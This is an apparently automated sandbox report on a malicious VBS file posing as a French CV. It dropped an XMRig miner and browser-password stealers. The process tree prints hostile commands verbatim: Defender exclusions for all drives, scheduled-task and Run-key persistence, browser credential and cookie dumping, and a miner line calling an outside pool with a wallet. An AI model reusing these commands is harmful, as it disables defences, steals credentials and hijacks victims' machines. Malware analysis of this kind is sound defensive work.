xmrig | c61ad5fe92dc1419e194c3e4a5425ac20c0a108eee2bfc39df9ba12018771be7

Analysis

max time kernel
144s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20250313-en
resource tags

arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
submitted
28/03/2025, 14:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

curriculum_vitae_nouveau.vbs
Size

8.3MB
MD5

ad99218f7eaed3cc79596b2a48a5b0de
SHA1

341461c93582a9eaa114e4084317fa69f2d30e4f
SHA256

c61ad5fe92dc1419e194c3e4a5425ac20c0a108eee2bfc39df9ba12018771be7
SHA512

fdc5dca67d58d850e43aa262786451620eeedb2baa421676a09f0fcdd363663b02a0d3c291421d87eef465c013587e653616f2047fe1ebcc82364f4663cfb3fd
SSDEEP

49152:ZQtV9vMAoKtZmJKLmumQ5uYdh1o6tP2ps3BvSGIJMNNLTaf4hVvCKaoRHNY6EvXX:Ot7Qukp

Score

10^/10

xmrig discovery execution miner persistence spyware stealer upx

Malware Config

Signatures

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral2/files/0x000700000002425f-58.dat	family_xmrig
behavioral2/files/0x000700000002425f-58.dat	xmrig

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detected Nirsoft tools 2 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/3820-66-0x0000000000400000-0x0000000000482000-memory.dmp	Nirsoft
behavioral2/files/0x0007000000024261-67.dat	Nirsoft

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/files/0x0007000000024261-67.dat	WebBrowserPassView

Blocklisted process makes network request 6 IoCs

flow	pid	Process
24	5364	WScript.exe
26	5364	WScript.exe
29	5364	WScript.exe
32	5364	WScript.exe
38	5364	WScript.exe
45	1808	wscript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3816	powershell.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
24	5364	WScript.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	wscript.exe

Deletes itself 1 IoCs

pid	Process
5364	WScript.exe

Executes dropped EXE 4 IoCs

pid	Process
5552	7g.exe
5464	mservice.exe
3820	go.exe
5604	ps.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Media Service = "wscript.exe \"C:\\Users\\Public\\WindowsUpdate\\mservice.vbs\" //b //nologo"	WScript.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000024262-60.dat	upx
behavioral2/memory/3820-62-0x0000000000400000-0x0000000000482000-memory.dmp	upx
behavioral2/memory/3820-66-0x0000000000400000-0x0000000000482000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	go.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ps.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7g.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
3980	taskkill.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5080	schtasks.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3816	powershell.exe
3816	powershell.exe
5604	ps.exe
5604	ps.exe
5604	ps.exe
5604	ps.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	3816	powershell.exe
Token: SeRestorePrivilege	5552	7g.exe
Token: 35	5552	7g.exe
Token: SeSecurityPrivilege	5552	7g.exe
Token: SeSecurityPrivilege	5552	7g.exe
Token: SeDebugPrivilege	3980	taskkill.exe
Token: SeLockMemoryPrivilege	5464	mservice.exe
Token: SeLockMemoryPrivilege	5464	mservice.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
5464	mservice.exe
1808	wscript.exe

Suspicious use of WriteProcessMemory 25 IoCs

description	pid	Process	procid_target
PID 5364 wrote to memory of 5036	5364	WScript.exe	95
PID 5364 wrote to memory of 5036	5364	WScript.exe	95
PID 5036 wrote to memory of 3816	5036	cmd.exe	97
PID 5036 wrote to memory of 3816	5036	cmd.exe	97
PID 5364 wrote to memory of 5552	5364	WScript.exe	100
PID 5364 wrote to memory of 5552	5364	WScript.exe	100
PID 5364 wrote to memory of 5552	5364	WScript.exe	100
PID 5364 wrote to memory of 4812	5364	WScript.exe	105
PID 5364 wrote to memory of 4812	5364	WScript.exe	105
PID 5364 wrote to memory of 1808	5364	WScript.exe	107
PID 5364 wrote to memory of 1808	5364	WScript.exe	107
PID 4812 wrote to memory of 5080	4812	cmd.exe	108
PID 4812 wrote to memory of 5080	4812	cmd.exe	108
PID 6060 wrote to memory of 5392	6060	cmd.exe	109
PID 6060 wrote to memory of 5392	6060	cmd.exe	109
PID 1808 wrote to memory of 3980	1808	wscript.exe	110
PID 1808 wrote to memory of 3980	1808	wscript.exe	110
PID 5392 wrote to memory of 5464	5392	wscript.exe	112
PID 5392 wrote to memory of 5464	5392	wscript.exe	112
PID 1808 wrote to memory of 3820	1808	wscript.exe	114
PID 1808 wrote to memory of 3820	1808	wscript.exe	114
PID 1808 wrote to memory of 3820	1808	wscript.exe	114
PID 1808 wrote to memory of 5604	1808	wscript.exe	115
PID 1808 wrote to memory of 5604	1808	wscript.exe	115
PID 1808 wrote to memory of 5604	1808	wscript.exe	115

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\curriculum_vitae_nouveau.vbs"
1⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Checks computer location settings
- Deletes itself
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:5364
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5036
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3816
- C:\Users\Public\7g.exe
  "C:\Users\Public\7g.exe" e -p1625093 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:5552
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4812
- - C:\Windows\system32\schtasks.exe
    schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5080
- C:\Windows\System32\wscript.exe
  "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo
  2⤵
  - Blocklisted process makes network request
  - Checks computer location settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:1808
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /f /im chrome.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3980
- - C:\Users\Public\windowsupdate\go.exe
    "C:\Users\Public\windowsupdate\go.exe" /scookiestxt "c:\users\public\others\new_cookies.txt"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3820
- - C:\Users\Public\windowsupdate\ps.exe
    "C:\Users\Public\windowsupdate\ps.exe" /stext "C:\Users\Public\others\logins.txt"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wscript.exe "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
1⤵
- Suspicious use of WriteProcessMemory
PID:6060
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:5392
- - C:\Users\Public\windowsupdate\mservice.exe
    "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 46h9kZidsk2VUmQNv72SLMMrizTnSJTYtHJRFXeBrZcDJjVHTn83T5teYjUggDNLbTYdwgsgHQC2N3LzoNQdqppN6SYmjYr -p 280325-1439 --coin=monero -k --tls --donate-level=0 --randomx-mode=auto --threads=8 --pause-on-active=10 --no-title
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:5464

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
1⤵
PID:3608

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v2jsxwvo.p00.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\7g.exe

Filesize
579KB

MD5
9f018e5feb96aae0e893a739c83a8b1f

SHA1
ec3b89ef381fd44deaf386b49223857a47b66bd8

SHA256
d2c0045523cf053a6b43f9315e9672fc2535f06aeadd4ffa53c729cd8b2b6dfe

SHA512
44d8504a693ad4d6b79631b653fc19b572de6bbe38713b53c45d9c9d5d3710aa8df93ee867a2a24419ebe883b8255fd18f30f8cf374b2242145fd6acb2189659

Download Submit
C:\Users\Public\WindowsUpdate\Update.xml

Filesize
2KB

MD5
21d6c92f3aa287a7bae667dc3618909e

SHA1
e09887d505c41e205adcdfc79a3203bfa9d735b2

SHA256
90ea3b7c2b00d4bd10e180777ffdaea8037da06208906dbe923ad7207f95c59f

SHA512
907e24370dde2ddeca4007fa563241280571aed2640c367645c859aa375431a88605ca18a775b3b346436c5db9e9dd53a7d4d8e8e6eae95dc0605b13bc721171

Download Submit
C:\Users\Public\WindowsUpdate\mozilla.vbs

Filesize
7KB

MD5
671e707199d3342bf92ea40a36d5d072

SHA1
47a49a50bc92c99c9808dfb1bf598bc3b13c8a48

SHA256
2d64444b089d1115af57105c0b9e5645872267ce89ec2a6c9b16975412f7769d

SHA512
a9ebbfcf718ddf49ae6219e22b51a1022f1d9af6dcb0dc68000bace40e5b6f5269ae5dc9f2be8f09765b199eb04f9cefde55b9b1ac9107b2f11b175a81cd1895

Download Submit
C:\Users\Public\WindowsUpdate\mservice.vbs

Filesize
1KB

MD5
9317de7dbbe81436c5e4f25b3743ef3b

SHA1
a3fdf866b8ef5e89e9ee729553a8d86a7ec79ce1

SHA256
d111d16738309bf217d1b08b1a53cb9371d061015f07152b248de41d864a2b89

SHA512
f315ca9a4c6a7f3b4acc5ddfbd6e74c28fbdcddc21910c9dbb610a473a6075739ad3388b106ddffe460560f0c3498f8f5e2ff3af6e6d05c7fdfe158f83bd0b6b

Download Submit
C:\Users\Public\gmail.7z

Filesize
1.9MB

MD5
aac610911886e8045a4c76cdb0259a42

SHA1
96f9685113ede27d9e83d3c0f8ca091a3ac494d3

SHA256
9a4236eb1c2299636ddaa2da63f2aa9a10dc27f7aadd93fec141f5be199ca9cd

SHA512
95f0c3b9a29679f3feff565a9960ce4228c666a4aa653ec8d462576d58c555fc54aa472ff68334429900a1c243b0970e0ab860b894f42dfd2dace63f4f7342a8

Download Submit
C:\Users\Public\others\logins.txt

Filesize
4KB

MD5
ba3d01ab9cfce4601fa1862582597bd5

SHA1
db2ab6b2568176b3a1ec78ca7a9df71a08959538

SHA256
e79f55fbd37cf82b8968653ce63053d34dae0140773587336a540c7edb0b08eb

SHA512
93d5bda703a39d0ef10b6b6136461a8f4e85aeb1c7b7260183fb2d20da17fefe7b4c4b189a7e0f4cf19f673c43ef2981e2795197f6ba9a47a13d64855744cb58

Download Submit
C:\Users\Public\others\new_cookies.txt

Filesize
82B

MD5
83602eb1d915614fe8612863709855c0

SHA1
722be8e639a9b038dbd7e9ad99e671a988b2fe38

SHA256
99dab49441dea5b9669958140d9f9cc865d79251264fcc076b3c47dd40fca404

SHA512
0af75098e348ca4606761dd73456263aa12791c206b8dd0dbb6c035087ddf13f8ebc7794b0e6788ab43ff5ff7fa623eb1ae376ad0a072fce8422dcbfbcaa5ae8

Download Submit
C:\Users\Public\others_VOEILKQD.zip

Filesize
22B

MD5
76cdb2bad9582d23c1f6f4d868218d6c

SHA1
b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

SHA256
8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

SHA512
5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

Download Submit
C:\Users\Public\others_VOEILKQD.zip

Filesize
682B

MD5
4dd59a20e505721d1d8d9129a3720742

SHA1
06fe87b9b23a9abc49d64124068c97b7e4604760

SHA256
fcbcacdab7ec9da9eb1c1070ae80c9d2802e8235d7f7a855551c1998ad381e70

SHA512
25e68c23a116dac23e9bd0bca71f152f5c8b9eae5dac754cce6c35342b59ba1194be2a31a0b5a1a629e2b18c4d465d0cbc11329f788b5c847b8b15b4ad5d41f4

Download Submit
C:\Users\Public\windowsupdate\go.exe

Filesize
238KB

MD5
81f2e954c408dace94c5ca19e876193d

SHA1
9c0e192a80e7761f6247ff5051d9154a7fb3a3bd

SHA256
967cdb1c1fec25e3a37442fc5788b419a7dbe95135ffe7560e4d7744fd8015db

SHA512
0bded3109b80d673c60b266aa7368a53593b289f089c1c47a63589112eb5e95fdf03f06aa23300bf3b0f168413dc9c4eb6143e5fcc5026226bcff4b1903d386a

Download Submit
C:\Users\Public\windowsupdate\mservice.exe

Filesize
4.5MB

MD5
cfc0000b993a31c11ef58ac53837e4e1

SHA1
750752b9c20c6bac25c172fc5a0645cc7d631457

SHA256
47d70838cbedc8b0e0634e51bde8a72035922bddc1177cc9210fa0adb967d6a2

SHA512
bf03704f5e363940328112825976b78be50e4a8be2a64d50eb71e1ec016946f9d6dd256ecd2b87105ae45614982351b27ae99a53284321c3ebbc16ce316b960e

Download Submit
C:\Users\Public\windowsupdate\ps.exe

Filesize
393KB

MD5
2024ea60da870a221db260482117258b

SHA1
716554dc580a82cc17a1035add302c0766590964

SHA256
53043bd27f47dbbe3e5ac691d8a586ab56a33f734356be9b8e49c7e975241a56

SHA512
ffcd4436b80169ba18db5b7c818c5da71661798963c0a5f5fbac99a6974a7729d38871e52bc36c766824dd54f2c8fa5711415ec45799db65c11293d8b829693b

Download Submit
memory/3816-15-0x00007FFEBAF10000-0x00007FFEBB9D1000-memory.dmp

Filesize
10.8MB

Download
memory/3816-0-0x00007FFEBAF13000-0x00007FFEBAF15000-memory.dmp

Filesize
8KB

Download
memory/3816-12-0x00007FFEBAF10000-0x00007FFEBB9D1000-memory.dmp

Filesize
10.8MB

Download
memory/3816-11-0x00007FFEBAF10000-0x00007FFEBB9D1000-memory.dmp

Filesize
10.8MB

Download
memory/3816-1-0x000002C2A11A0000-0x000002C2A11C2000-memory.dmp

Filesize
136KB

Download
memory/3820-66-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3820-62-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5464-63-0x00000208CA680000-0x00000208CA6A0000-memory.dmp

Filesize
128KB

Download